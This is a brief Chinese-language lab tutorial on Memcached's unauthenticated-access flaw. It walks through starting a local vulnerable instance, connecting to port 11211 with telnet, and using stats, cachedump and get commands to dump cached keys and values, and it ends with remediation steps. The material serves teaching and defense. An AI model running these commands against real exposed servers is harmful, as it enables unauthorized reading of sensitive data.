1.Memcached 是一套常用的 key-value 分布式高速缓存系统,由于 Memcached 的安全设计缺陷没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者
无需认证通过命令交互可直接读取 Memcached中的敏感信息
步骤一:下载Memcached程序并执行以下命令..启动Memcached漏洞环境
下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start
步骤二:使用Telnet程序探测目标的11211端口
#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造成敏感信息泄露
步骤三:使用Nmap程序的脚本进行漏洞扫描
》》》漏洞修复《《《
1.设置Memchached只允许本地访问。
2.禁止外网访问Memcached 11211端口。
3.配置访问控制策略。